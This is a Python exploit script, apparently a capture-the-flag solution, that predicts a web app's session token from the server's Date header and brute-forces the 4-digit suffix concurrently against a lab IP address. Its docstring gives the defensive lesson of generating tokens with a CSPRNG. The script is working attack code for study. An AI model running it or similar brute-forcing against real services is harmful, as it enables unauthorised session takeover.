"""Demonstration of a guessable session token built from the server clock.

The target issues a token of the form ``<unix time>`` + ``<4-digit number>``;
this script reads the server's ``Date`` header to recover the time component
and then walks the 4-digit suffix over a shared HTTP session.  From a
defensive point of view the lesson is that a token whose only entropy is a
four-digit counter on top of a value the server itself publishes (the
``Date`` header) offers ~9 000 candidates per second and should instead be
generated with a CSPRNG (e.g. ``secrets.token_urlsafe``) and compared in
constant time.

Third-party requirements: ``requests`` and ``rich``.
"""
try:
    # pip install requests rich
    import requests
    from rich.console import Console
    from rich.progress import Progress, SpinnerColumn, TimeElapsedColumn
    from rich.traceback import install
    from rich import inspect
    from rich import print
except ImportError as e:
    # `print` here is still the builtin (the rich one was not imported).
    print(e, "- Is it installed?")
    exit(1)

# -------------------------
from datetime import datetime, timezone
from concurrent.futures import ThreadPoolExecutor as Executor

MAX_WORKERS = 20  # Less aggressive but still fast enough

# Rich tracebacks; show_locals=True dumps every local (including the session
# object and the URL) on any uncaught exception, which is handy for debugging.
install(show_locals=True)
console = Console()


def main() -> None:
    """Recover the server timestamp, then try each 4-digit suffix until a
    response without the "Malicious" marker is seen.

    Returns:
        None. Progress and the final response body are written to the
        console via ``rich``.

    Raises:
        KeyError: if the initial response carries no ``Date`` header.
        ValueError: if the ``Date`` header does not match the RFC 7231 layout
            used in the ``strptime`` call below.
    """
    # NOTE(review): the Session is never closed; a `with requests.Session()`
    # block would release the connection pool on exit.
    client = requests.Session()
    entrypoint = "http://10.0.160.47"

    # Since the site uses `session_start`, we need to
    # hold our session in order to exploit the vulnerability
    initial_response = client.get(entrypoint, params={"token": "DUMMY"})
    inspect(initial_response)

    print("[yellow](i)[/] Launching exploit...")

    # The server uses the time() value to generate the token so we
    # need to extract that value to bypass token verification
    date_value = initial_response.headers["Date"]
    # %Z consumes the textual zone ("GMT") but yields a naive datetime, hence
    # the explicit tzinfo below; HTTP dates are always GMT, so tagging it UTC
    # is correct.
    date_obj = datetime.strptime(date_value, "%a, %d %b %Y %H:%M:%S %Z")
    # Convert the datetime object to UTC timezone
    date_obj = date_obj.replace(tzinfo=timezone.utc)
    # Get the timestamp in seconds since the epoch
    server_timestamp = int(date_obj.timestamp())

    print(f"{date_value = }\n -> {date_obj = }\n -> {server_timestamp = }")

    # Shared stop flag for the worker threads.  It is read and written without
    # a lock; since it only ever transitions False -> True the worst case is a
    # few extra requests after the first success, not a wrong result.
    already_found: bool = False

    with Progress(
        SpinnerColumn(),
        *Progress.get_default_columns(),
        TimeElapsedColumn(),
        console=console,
    ) as progress:
        # total=None renders an indeterminate spinner until the final update.
        timer = progress.add_task(
            "[yellow] Processing...", total=None, complete_style="green"
        )

        # We define how we are going to process possible tokens
        def send_token_attempt(guess: int) -> None:
            """Try one candidate suffix; set ``already_found`` on success.

            Args:
                guess: the 4-digit suffix appended to ``server_timestamp``.
            """
            nonlocal already_found
            if already_found:
                return

            possible_token = f"{server_timestamp}{guess}"
            console.log(f"[yellow](i)[/] Trying with token: '{possible_token}'...")
            response = client.get(entrypoint, params={"token": possible_token})
            # inspect(response)

            # Success is inferred from the absence of the rejection marker;
            # any other unexpected body (e.g. an error page) is also taken as
            # success.
            if "Malicious" not in response.text:
                console.log(f"[green](✓)[/] Here's your flag: [cyan]{response.text}[/]")
                already_found = True
                return

        # We need to check 8999 possible values to get our flag
        # Since we don't have all day, i'll use some concurrency
        # to speed up the process a bit
        # (range(1000, 9999 + 1) actually yields 9000 candidates, 1000..9999.)
        with Executor(max_workers=MAX_WORKERS) as executor:
            # Draining the map iterator is what surfaces any exception raised
            # inside a worker; the yielded values themselves are all None.
            for future in executor.map(send_token_attempt, range(1000, 9999 + 1)):
                # Do nothing here...
                pass

        # Switch the spinner to a determinate bar and fill it to 100%.
        progress.update(timer, description="[green]Completed!", total=100)
        progress.update(timer, advance=100)


if __name__ == "__main__":
    main()